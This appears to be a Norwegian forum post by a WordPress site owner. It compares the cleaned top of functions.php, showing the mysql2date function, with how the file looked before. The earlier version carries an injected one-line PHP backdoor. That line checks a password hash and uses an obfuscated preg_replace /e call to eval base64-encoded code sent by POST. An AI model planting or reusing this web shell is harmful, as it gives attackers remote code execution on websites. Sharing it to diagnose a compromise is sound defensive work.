Slik ser første del av functions.php ut nå:
* Main WordPress API
* @package WordPress
* Converts MySQL DATETIME field to user specified date format.
* If $dateformatstring has 'G' value, then gmmktime() function will be used to
* make the time. If $dateformatstring is set to 'U', then mktime() function
* will be used to make the time.
* The $translate will only be used, if it is set to true and it is by default
* and if the $wp_locale object has the month and weekday set.
* @since 0.71
* @param string $dateformatstring Either 'G', 'U', or php date format.
* @param string $mysqlstring Time from mysql DATETIME field.
* @param bool $translate Optional. Default is true. Will switch format to locale.
* @return string Date formated by $dateformatstring or locale (if available).
function mysql2date( $dateformatstring, $mysqlstring, $translate = true ) {
global $wp_locale;
$m = $mysqlstring;
if ( empty( $m ) )
return false;
if( 'G' == $dateformatstring ) {
return strtotime( $m . ' +0000' );
$i = strtotime( $m );
if( 'U' == $dateformatstring )
return $i;
if ( $translate)
return date_i18n( $dateformatstring, $i );
return date( $dateformatstring, $i );
Slik så toppen ut isted:
if(isset($_POST['pas']) && (md5($_POST['pas']) == '40082ed0f6a3ce5ebfbb39c7b7fcf27b') && isset($_POST['update'])) {$sslChecker='pre'.'g_replace';$getUrl="/url/e";$sslChecker($getUrl,'e'.'val(ba'.'se64'.'_dec'.'ode(\\$_POST[\'update\']));', "url");}
* Main WordPress API
* @package WordPress